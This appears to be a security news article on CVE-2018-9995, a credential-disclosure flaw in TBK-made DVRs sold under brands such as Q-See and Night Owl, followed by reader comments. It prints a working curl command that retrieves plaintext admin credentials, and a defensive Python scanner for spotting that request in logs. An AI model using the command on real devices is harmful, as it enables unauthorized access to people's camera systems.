Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is outlined in CVE-2018-9995.
The DVRs affected are manufactured by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).

The plain text credentials returned from this command granted admin access to the device.
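For defenders, the request above has a distinctive shape that can be searched for in proxy or web server logs placed in front of these DVRs. The Python below is an added example, not code from IPVM or the researcher; the log layout (source, request line, status, Cookie header), the labels, and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log layout (not from the article): src "METHOD target HTTP/x" status "Cookie"
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

def cookie_value(header, name):
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def classify_request(target, cookie_header):
    """Label a request that matches the CVE-2018-9995 credential listing."""
    url = urlsplit(target)
    if url.path.rsplit("/", 1)[-1].lower() != "device.rsp":
        return None
    # Compare parsed parameters so reordered query strings still match.
    query = parse_qs(url.query)
    if query.get("opt", [""])[-1] != "user" or query.get("cmd", [""])[-1] != "list":
        return None
    if cookie_value(cookie_header, "uid") == "admin":
        return "credential-list+uid=admin"
    return "credential-list"

def scan(lines):
    """Return (source, label, status) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        src, _method, target, status, cookie = m.groups()
        label = classify_request(target, cookie)
        if label:
            hits.append((src, label, int(status)))
    return hits

# Constructed sample lines using documentation-only addresses.
SAMPLE_LOG = [
    '198.51.100.7 "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 "uid=admin"',
    '198.51.100.7 "GET /device.rsp?cmd=list&opt=user HTTP/1.1" 200 "lang=en; uid=admin"',
    '203.0.113.9 "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 401 "-"',
    '192.0.2.20 "GET /device.rsp?opt=example&cmd=example HTTP/1.1" 200 "uid=operator"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The status code is kept in each hit so that requests the device answered can be told apart from ones it rejected.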
opt=user&cmd=list
Obviously they really tried hard to hide this backdoor ;)
Do they have a business presence in the US?

TBK is a Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Costco, and more.

05/03/18 08:31pm
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?

05/10/18 08:06pm
Manufactured by TBK, a Spanish company? Are they really manufactured in a Spanish country?
Those DVRs were designed and manufactured by Streamax, China.